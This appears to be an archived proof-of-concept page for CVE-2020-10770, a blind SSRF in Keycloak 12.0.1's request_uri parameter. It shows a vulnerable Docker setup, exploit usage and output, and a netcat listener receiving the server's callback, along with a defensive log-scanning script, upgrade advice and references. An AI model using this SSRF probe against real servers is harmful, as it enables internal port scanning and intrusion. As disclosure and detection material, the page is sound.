
POC details: 6ed813ba1cdfc33bf855985e721823dc69e39af9

Source
Related vulnerability
Title: Red Hat Keycloak code issue vulnerability (CVE-2020-10770)
Description: Red Hat Keycloak is a software suite from the US company Red Hat that provides authentication and management functions for modern applications and services. Keycloak contains a code issue vulnerability: the server can be made to call an unvalidated URL supplied through the OIDC parameter request_uri. This flaw allows an attacker to use the parameter to perform a server-side request forgery (SSRF) attack.
Description
Keycloak 12.0.1 - 'request_uri' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Introduction
# Keycloak-12.0.1-CVE-2020-10770

> Keycloak 12.0.1 - 'request_uri' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)

[Exploit-DB-50405](https://www.exploit-db.com/exploits/50405)

Expected outcome: Port scan of localhost or internally accessible hosts.

Intended only for educational use and for testing in corporate environments.

This exploit was tested on Python 3.8.6.

Vulnerable application:

```shell
docker run -p 9990:9990 -p 8080:8080 -e KEYCLOAK_USER=admin -e KEYCLOAK_PASSWORD=admin jboss/keycloak:12.0.1
```
### Usage:

```shell
cfx:  ~/keycloak
→ python3 exploit.py -h
usage: exploit.py [-h] [-u URL]

-=[Keycloak Blind SSRF test by ColdFusionX]=-

optional arguments:
  -h, --help         show this help message and exit
  -u URL, --url URL  Keycloak Target URL (Example: http://127.0.0.1:8080)

Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
```

### POC: 

- Scenario 1: Non Vulnerable Target

```shell
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:4444

[-] Invalid URL or Target not Vulnerable
```

- Scenario 2: Vulnerable Target

```shell
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:9994

[+] BINGO! Check Netcat listener for HTTP callback :)
```

HTTP Callback on nc listener:

```shell
cfx:  ~/keycloak
→ nc -lvnp 9994
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9994
Ncat: Listening on 0.0.0.0:9994
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:36866.
GET / HTTP/1.1
Host: 192.168.0.1:9994
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.9.1)
Accept-Encoding: gzip,deflate
```

### Solution

Upgrade to Keycloak 12.0.2 or a later version.

### Reference

- https://bugzilla.redhat.com/show_bug.cgi?id=1846270
- https://nvd.nist.gov/vuln/detail/CVE-2020-10770
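The callback shown above originates from the Keycloak container itself, so the defensive signal lives in the authorization requests that carry a `request_uri`. The following Python script is an added example (not part of this POC, Exploit-DB entry or Keycloak) that scans constructed access-log lines for `/protocol/openid-connect/auth` requests whose `request_uri` points at a loopback or private address, or at a host outside an assumed allowlist; the log format, the sample lines and the allowlisted host `sso.example.com` are all assumptions.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format style); not real Keycloak logs.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2021:12:00:01 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=account&response_type=code&request_uri=http%3A%2F%2F192.168.0.1%3A9994%2F HTTP/1.1" 400 0
10.0.0.6 - - [10/Oct/2021:12:00:02 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=account&response_type=code&request_uri=https%3A%2F%2Fsso.example.com%2Frequests%2Fabc HTTP/1.1" 302 0
10.0.0.7 - - [10/Oct/2021:12:00:03 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=account&response_type=code HTTP/1.1" 302 0
10.0.0.8 - - [10/Oct/2021:12:00:04 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=account&request_uri=http%3A%2F%2F127.0.0.1%3A9990%2F HTTP/1.1" 400 0
"""

# Assumed allowlist: the only hosts from which request objects may legitimately be fetched.
ALLOWED_REQUEST_URI_HOSTS = {"sso.example.com"}
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def is_internal_host(host):
    """True for loopback, private and link-local IPs and for obvious local names."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost" or host.endswith(".local")
    return ip.is_loopback or ip.is_private or ip.is_link_local

def classify_request_uri(value):
    """allowed: allowlisted host; internal: points into the server's own network; unlisted: other."""
    host = urlsplit(value).hostname or ""
    if host in ALLOWED_REQUEST_URI_HOSTS:
        return "allowed"
    if is_internal_host(host):
        return "internal"
    return "unlisted"

def find_suspicious_request_uris(log_text):
    """Return (client_ip, request_uri, verdict) for every non-allowlisted request_uri on the auth endpoint."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.endswith("/protocol/openid-connect/auth"):
            continue
        # parse_qs percent-decodes the value, so the original URL is recovered
        for value in parse_qs(target.query).get("request_uri", []):
            verdict = classify_request_uri(value)
            if verdict != "allowed":
                findings.append((line.split()[0], value, verdict))
    return findings
```

Running `find_suspicious_request_uris(SAMPLE_LOG)` on the constructed lines flags the two requests aimed at 192.168.0.1 and 127.0.0.1 and ignores the allowlisted host and the request without a `request_uri`.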
File snapshot

```
[4.0K] /data/pocs/6ed813ba1cdfc33bf855985e721823dc69e39af9
├── [1.8K] exploit.py
├── [1.0K] LICENSE
└── [2.0K] README.md

0 directories, 3 files
```

Cached for you by the Shenlong bot.

Notes
    1. We recommend accessing the POC through the source link first.
    2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying or donating for the local POC. Thank you for your support.